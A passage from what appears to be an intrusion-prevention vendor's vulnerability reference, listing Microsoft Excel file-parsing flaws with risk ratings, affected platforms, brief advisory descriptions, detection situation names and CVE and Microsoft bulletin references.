There exists a buffer overflow vulnerability in Microsoft Excel. The flaw is caused by insufficient checks while parsing COLINFO Records in the Excel files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack case where code injection is not successful, all instances of the vulnerable Microsoft Excel application will terminate or the application will stop responding. This can potentially lead to a loss of data. In a more sophisticated attack, where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.

Situation:

File-OLE_Microsoft-Excel-Colinfo-Record-Buffer-Overflow

References:

CVE-2006-3875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3875

BID-20391
http://www.securityfocus.com/bid/20391

MS06-059
http://technet.microsoft.com/security/bulletin/MS06-059

Microsoft-Excel-Column-Record-Handling-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-93-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS

Software:

Microsoft Excel

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel. A crafted Excel spreadsheet file (XLS) can be used to terminate the affected product or execute non-privileged arbitary code.

Situation:

HTTP_Microsoft-Excel-Column-Record-Handling-Memory-Corruption
File-OLE_Microsoft-Excel-Column-Record-Handling-Memory-Corruption

References:

CVE-2007-0030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0030

BID-21925
http://www.securityfocus.com/bid/21925

OSVDB-31257
http://www.osvdb.org/31257

MS07-002
http://technet.microsoft.com/security/bulletin/MS07-002

Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel

Situation:

HTTP_SS-Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability
File-OLE_Microsoft-Excel-Conditional-Expression-Parsing-Vulnerability

References:

CVE-2011-1989
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1989

MS11-072
http://technet.microsoft.com/security/bulletin/MS11-072

Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Microsoft Excel

Type:

Buffer Overflow

Description:

There is a code execution vulnerability in Microsoft Excel. The vulnerability is due to improper parsing of the conditional formatting record from a Excel worksheet file. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution
File-OLE_Microsoft-Excel-Conditional-Formatting-Values-Handling-Code-Execution

References:

CVE-2008-0117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0117

BID-28170
http://www.securityfocus.com/bid/28170

MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014

Microsoft-Excel-Continuefrt12-Record-Parsing-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-1403-5242

Last changed:

sgpkg-ips-1403-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Buffer Overflow

Description:

Improper parsing of ContinueFrt12 records in an XLS document causes a heap buffer overflow in Excel. A successful exploit allows an attacker to execute arbitrary code with the privileges of the target process.

Situation:

File-OLE_Microsoft-Excel-Continuefrt12-Record-Parsing-Heap-Buffer-Overflow

References:

CVE-2021-34501
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34501

Microsoft-Excel-Crafted-Picture-Record-Code-Execution

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-251-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel. The flaw is due to improper handling of crafted Excel spreadsheet files. An attacker can persuade the target user to open a malicious Excel spreadsheet to exploit this vulnerability. Successful attack allows for arbitrary code injection and execution with privileges of the currently logged on user. In an attack where arbitrary code is injected and executed on the target system, the behavior of the target depends on the intended function of the malicious code. In an unsuccessful attack, the vulnerable application may terminate as a result of invalid memory access.

Situation:

HTTP_SS-Microsoft-Excel-Crafted-Picture-Record-Code-Execution
File-OLE_Microsoft-Excel-Crafted-Picture-Record-Code-Execution

References:

CVE-2009-0100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0100

BID-34413
http://www.securityfocus.com/bid/34413

OSVDB-53665
http://www.osvdb.org/53665

MS09-009
http://technet.microsoft.com/security/bulletin/MS09-009

Microsoft-Excel-Crafted-Url-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-71-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Buffer Overflow

Description:

Microsoft Excel has a buffer overflow vulnerability in the handling of excessively long strings in link objects. The vulnerability can be exploited by persuading a user to open a specially crafted Excel file and to follow a malicious link, causing a DoS condition terminating all instances of the Microsoft Excel application, and potentially leading to a loss of data or arbitrary code execution with the privileges of the currently logged in user.

Situation:

HTTP_Microsoft-Excel-Crafted-Url-Buffer-Overflow
E-Mail_BS-Microsoft-Excel-Crafted-Url-Buffer-Overflow
File-OLE_Microsoft-Excel-Crafted-Url-Buffer-Overflow

References:

CVE-2006-3086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3086

BID-18500
http://www.securityfocus.com/bid/18500

OSVDB-26666
http://www.osvdb.org/26666

MS06-050
http://technet.microsoft.com/security/bulletin/MS06-050

Microsoft-Excel-CVE-2016-7262-Security-Feature-Bypass

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-835-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Microsoft Excel detected

Situation:

File-TextId_Microsoft-Excel-CVE-2016-7262-Security-Feature-Bypass

References:

CVE-2016-7262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7262

MS16-148
http://technet.microsoft.com/security/bulletin/MS16-148

Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980

About this vulnerability:

An attempt to exploit Excel vulnerability CVE-2011-0980

Risk:

Moderate

First detected in:

sgpkg-ips-387-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel record parsing may lead to code execution

Situation:

HTTP_SS-Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980
File-OLE_Microsoft-Excel-Dangling-Pointer-Vulnerability-CVE-2011-0980

References:

CVE-2011-0980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0980

MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021

Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105

About this vulnerability:

An attempt to exploit Excel vulnerability CVE-2011-0105

Risk:

Moderate

First detected in:

sgpkg-ips-387-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel record parsing may lead to code execution

Situation:

HTTP_SS-Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105
File-OLE_Microsoft-Excel-Data-Initialization-Vulnerability-CVE-2011-0105

References:

CVE-2011-0105
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0105

MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021

Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-292-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel 2002; Microsoft Excel 2004 for Mac; Microsoft Excel 2008 for Mac

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Excel.

Situation:

HTTP_SS-Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264
File-OLE_Microsoft-Excel-DbOrParamQry-Record-Parsing-CVE-2010-0264

References:

CVE-2010-0264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0264

MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017

Microsoft-Excel-Embedded-Shockwave-Flash-Object-Code-Execution

About this vulnerability:

Flash based code execution vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-71-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

Microsoft Excel has a Flash-based code execution vulnerability. The vulnerability can be exploited by persuading a user to open a specially crafted Excel file containing an embedded Shockwave Flash Object, leading to arbitrary script code execution.

Situation:

HTTP_Microsoft-Excel-Embedded-Flash-Object-JavaScript-Code-Execution
E-Mail_BS-Microsoft-Excel-Embedded-Flash-Object-JavaScript-Code-Execution
File-OLE_Microsoft-Excel-Embedded-Flash-Object-JavaScript-Code-Execution

References:

CVE-2006-3014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3014

BID-18583
http://www.securityfocus.com/bid/18583

MS06-069
http://technet.microsoft.com/security/bulletin/MS06-069

Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-320-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel.

Situation:

E-Mail_BS-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249
HTTP_SS-Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249
File-OLE_Microsoft-Excel-ExternName-Record-Parsing-Buffer-Overflow-CVE-2010-1249

References:

CVE-2010-1249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1249

BID-40527
http://www.securityfocus.com/bid/40527

OSVDB-65232
http://www.osvdb.org/65232

MS10-038
http://technet.microsoft.com/security/bulletin/MS10-038

Microsoft-Excel-File-Handling-Code-Execution-Vulnerability

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-141-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel. The vulnerability is a due to improper parsing of a record of Excel files. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Microsoft-Excel-File-Handling-Code-Execution-Vulnerability
File-OLE_Microsoft-Excel-File-Handling-Code-Execution-Vulnerability

References:

CVE-2008-0081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081

BID-27305
http://www.securityfocus.com/bid/27305

MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014

Microsoft-Excel-File-Importing-Code-Execution

About this vulnerability:

Code execution vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-173-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

There is a code execution vulnerability in Microsoft Excel. By persuading a user to open a crafted Excel SYLK document with a vulnerable version of the affected application, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.

Situation:

E-Mail_BS-Microsoft-Excel-File-Importing-Code-Execution
HTTP_SS-Microsoft-Excel-File-Importing-Code-Execution
File-TextId_Microsoft-Excel-File-Importing-Code-Execution

References:

CVE-2008-0112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0112

BID-28095
http://www.securityfocus.com/bid/28095

OSVDB-42723
http://www.osvdb.org/42723

MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014

Microsoft-Excel-File-Parsing-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-454-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Office

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Excel. The vulnerability is due to the way in which Excel processes various modified bytes in Excel files. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user to open a crafted Excel document. A successful exploitation attempt may result in the execution of arbitrary code in the security context of the target user.

Situation:

File-OLE_Microsoft-Excel-File-Parsing-Memory-Corruption

References:

CVE-2012-0143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0143

BID-53374
http://www.securityfocus.com/bid/53374

OSVDB-81726
http://www.osvdb.org/81726

MS12-030
http://technet.microsoft.com/security/bulletin/MS12-030

Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-292-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel 2007; Microsoft Excel 2004 for Mac

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Excel.

Situation:

HTTP_SS-Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262
File-OLE_Microsoft-Excel-FNGROUPNAME-Record-Uninitialized-Memory-CVE-2010-0262

References:

CVE-2010-0262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0262

BID-38553
http://www.securityfocus.com/bid/38553

MS10-017
http://technet.microsoft.com/security/bulletin/MS10-017

Microsoft-Excel-For-Asian-Languages-Style-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in numerous versions of Microsoft Excel. The flaw is caused by insufficient checks when handling the Style record of the document, resulting in a stack buffer overflow. An attacker can leverage this vulnerability by enticing a user to open a crafted Excel Spreadsheet document, thereby injecting and executing arbitrary code. The vendor has released an updated security bulletin addressing this issue in the 2006 October patch release cycle. In an attack case where code injection is not successful, all instances of the vulnerable Microsoft Excel application will terminate. This can potentially lead to loss of data in cases where spreadsheet documents are open. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user. The affected application would also most likely stop functioning as a result of such an attack.

Situation:

File-OLE_Microsoft-Excel-For-Asian-Languages-Style-Handling-Buffer-Overflow

References:

CVE-2006-3431
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3431

BID-18872
http://www.securityfocus.com/bid/18872

MS06-059
http://technet.microsoft.com/security/bulletin/MS06-059

Microsoft-Excel-Format-Record-Array-Index-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-548-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Office

Type:

Malfunction

Description:

There is a code execution vulnerability in Microsoft Excel. The vulnerability is due to insufficient validation of an index value when parsing the FORMAT record. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access. If unexpected termination of the vulnerable application is the sole result of an attack, there is no impact to the overall operation of the target host. It is, however, possible to lose all unsaved data due to the abnormal termination.

Situation:

File-OLE_Microsoft-Excel-Format-Record-Array-Index-Memory-Corruption

References:

CVE-2008-3005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3005

BID-30639
http://www.securityfocus.com/bid/30639

MS08-043
http://technet.microsoft.com/security/bulletin/MS08-043

Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-176-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Excel. When loading workbooks, Excel does not validate the input data correctly, allowing crafted files with FRTWrapper records to be loaded. Remote attackers can exploit this vulnerability by enticing target users to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow
File-OLE_Microsoft-Excel-Frtwrapper-Record-Buffer-Overflow

References:

CVE-2008-3471
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3471

BID-31705
http://www.securityfocus.com/bid/31705

MS08-057
http://technet.microsoft.com/security/bulletin/MS08-057

Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977

About this vulnerability:

An attempt to exploit Microsoft Excel vulnerability CVE-2011-0977

Risk:

Moderate

First detected in:

sgpkg-ips-388-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel record parsing may lead to code execution

Situation:

HTTP_SS-Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977
File-OLE_Microsoft-Excel-Graphic-Object-Deref-Vulnerability-CVE-2011-0977

References:

CVE-2011-0977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0977

MS11-023
http://technet.microsoft.com/security/bulletin/MS11-023

Microsoft-Excel-Heap-Corruption-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-412-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel

Situation:

HTTP_SS-Microsoft-Excel-Heap-Corruption-Vulnerability
File-Binary_Microsoft-Excel-Heap-Corruption-Vulnerability

References:

CVE-2011-1988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1988

MS11-072
http://technet.microsoft.com/security/bulletin/MS11-072

Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098

About this vulnerability:

An attempt to exploit Excel vulnerability CVE-2011-0098

Risk:

Moderate

First detected in:

sgpkg-ips-386-4219

Last changed:

sgpkg-ips-1652-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A code execution vulnerability exists in Microsoft Office Excel. The vulnerability is due to a flaw in the parsing of Label record in Excel documents, causing a buffer overflow. Remote attackers can exploit this vulnerability by enticing target users to open a malicious Excel file, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

HTTP_SS-Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098
File-OLE_Microsoft-Excel-Heap-Overflow-Vulnerability-CVE-2011-0098

References:

CVE-2011-0098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0098

BID-47235
http://www.securityfocus.com/bid/47235

OSVDB-71759
http://www.osvdb.org/71759

MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021

Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273

About this vulnerability:

An attempt to exploit vulnerability in Microsoft Excel detected

Risk:

Moderate

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Input Validation

Description:

Vulnerability in Microsoft Excel

Situation:

HTTP_SS-Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273
File-OLE_Microsoft-Excel-Improper-Record-Parsing-Vulnerability-CVE-2011-1273

References:

CVE-2011-1273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1273

OSVDB-72921
http://www.osvdb.org/72921

MS11-045
http://technet.microsoft.com/security/bulletin/MS11-045

Microsoft-Excel-Information-Disclosure-Vulnerability-CVE-2019-1112

About this vulnerability:

An attempt to exploit a vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-1175-5242

Last changed:

sgpkg-ips-1652-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Input Validation

Description:

An attempt to exploit a vulnerability in Microsoft Excel

References:

CVE-2019-1112
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1112

Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097

About this vulnerability:

An attempt to exploit Excel vulnerability CVE-2011-0097

Risk:

Moderate

First detected in:

sgpkg-ips-387-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel record parsing may lead to code execution

Situation:

HTTP_SS-Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097
File-OLE_Microsoft-Excel-Integer-Overrun-Vulnerability-CVE-2011-0097

References:

CVE-2011-0097
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0097

BID-47201
http://www.securityfocus.com/bid/47201

OSVDB-71758
http://www.osvdb.org/71758

MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021

Microsoft-Excel-Linked-List-Corruption-Vulnerability-CVE-2011-0979

About this vulnerability:

An attempt to exploit Excel vulnerability CVE-2011-0979

Risk:

Moderate

First detected in:

sgpkg-ips-387-4219

Last changed:

sgpkg-ips-1396-5242

Platform:

Windows

Software:

Microsoft Excel

Type:

Malfunction

Description:

A vulnerability in Microsoft Excel record parsing may lead to code execution

Situation:

HTTP_SS-Microsoft-Excel-Linked-List-Corruption-Vulnerability-CVE-2011-0979

References:

CVE-2011-0979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0979

OSVDB-70904
http://www.osvdb.org/70904

MS11-021
http://technet.microsoft.com/security/bulletin/MS11-021

Microsoft-Excel-Malformed-File-Format-Parsing-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office

Type:

Malfunction

Description:

There exists a code execution vulnerability in Microsoft Excel. The vulnerability is caused by improper processing of malformed BOOLERR records within Excel spreadsheet files. An attacker may exploit this vulnerability by enticing a user to open a crafted Excel file, which will enable the attacker to inject and execute arbitrary code within the security context of the target user. In an attack case where code injection is not successful, all instances of the vulnerable Microsoft Excel application will terminate. This can potentially lead to a loss of data. In a more sophisticated attack where code injection results is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.

Situation:

File-Binary_Microsoft-Excel-Malformed-File-Format-Parsing-Code-Execution

References:

CVE-2006-0028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0028

OSVDB-23899
http://www.osvdb.org/23899

MS06-012
http://technet.microsoft.com/security/bulletin/MS06-012

Microsoft-Excel-Malformed-Filter-Records-Handling-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office

Type:

Malfunction

Description:

A memory corruption vulnerability exists in the way Microsoft Excel processes files. The vulnerability is a result of insufficient data validation while processing Excel AutoFilter records. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any code injected will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Excel will terminate resulting in the loss of any unsaved data from the current session.

Situation:

File-OLE_Microsoft-Excel-Malformed-Filter-Records-Handling-Code-Execution

References:

CVE-2007-1214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1214

BID-23780
http://www.securityfocus.com/bid/23780

OSVDB-34395
http://www.osvdb.org/34395

MS07-023
http://technet.microsoft.com/security/bulletin/MS07-023

Microsoft-Excel-Malformed-Fngroupcount-Value-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office

Type:

Malfunction

Description:

There exists a code execution vulnerability in Microsoft Excel. The flaw is caused by an insufficient check of a malformed FNGROUPCOUNT Record in an Excel file. An attacker can exploit this vulnerability to inject and execute arbitrary code in the security context of the currently logged in user. In an attack case where code injection is not successful, the Microsoft Excel application will terminate. This can potentially lead to a loss of data. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.

Situation:

File-OLE_Microsoft-Excel-Malformed-Fngroupcount-Value-Code-Execution

References:

CVE-2006-1308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1308

BID-18890
http://www.securityfocus.com/bid/18890

MS06-037
http://technet.microsoft.com/security/bulletin/MS06-037

Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-385-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office; Microsoft Office Compatibility Pack; Microsoft Office

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Microsoft Excel. The vulnerability is due to improper handling of malformed formulas. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Excel file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution
File-OLE_Microsoft-Excel-Malformed-Formula-Parsing-Code-Execution

References:

CVE-2008-0115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0115

BID-28167
http://www.securityfocus.com/bid/28167

MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014

Microsoft-Excel-Malformed-Imdata-Record

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS X

Software:

Microsoft Excel

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Excel. A crafted Excel spreadsheet file (XLS) may be used to execute code in the privilege of the current user.

Situation:

HTTP_Microsoft-Excel-Malformed-Imdata-Record
File-OLE_Microsoft-Excel-Malformed-Imdata-Record

References:

CVE-2007-0027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0027

BID-21856
http://www.securityfocus.com/bid/21856

OSVDB-31255
http://www.osvdb.org/31255

MS07-002
http://technet.microsoft.com/security/bulletin/MS07-002

Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Microsoft Excel

Risk:

High

First detected in:

sgpkg-ips-91-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Mac OS

Software:

Microsoft Excel; Microsoft Excel Viewer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Microsoft Excel. A crafted Excel spreadsheet file (XLS) may be used to execute code in the privilege of the current user.

Situation:

HTTP_Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption
File-OLE_Microsoft-Excel-Malformed-Palette-Record-Memory-Corruption

References:

CVE-2007-0031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0031

BID-21922
http://www.securityfocus.com/bid/21922

OSVDB-31258
http://www.osvdb.org/31258

MS07-002
http://technet.microsoft.com/security/bulletin/MS07-002

Microsoft-Excel-Malformed-Record-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Excel; Microsoft Excel Viewer; Microsoft Office

Type:

Malfunction

Description:

There exists a code execution vulnerability in Microsoft Excel. The vulnerability is caused by improper sanitization of an undocumented record in Excel spreadsheet files. An attacker may exploit this vulnerability by enticing a user to open a crafted Excel file, which will enable the attacker to inject and execute arbitrary code within the security context of the target user. In an attack case where code injection is not successful, all instances of the vulnerable Microsoft Excel application will terminate. This can potentially lead to a loss of data. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the current user.

Situation:

File-OLE_Microsoft-Excel-Malformed-Fngroupcount-Value-Code-Execution

References:

CVE-2006-0031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0031

BID-17101
http://www.securityfocus.com/bid/17101

OSVDB-23902
http://www.osvdb.org/23902

MS06-012
http://technet.microsoft.com/security/bulletin/MS06-012

Microsoft-Excel-Malformed-Selection-Record-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Excel

Risk:

Moderate

First detected in:

sgpkg-ips-416-4219

Last changed:

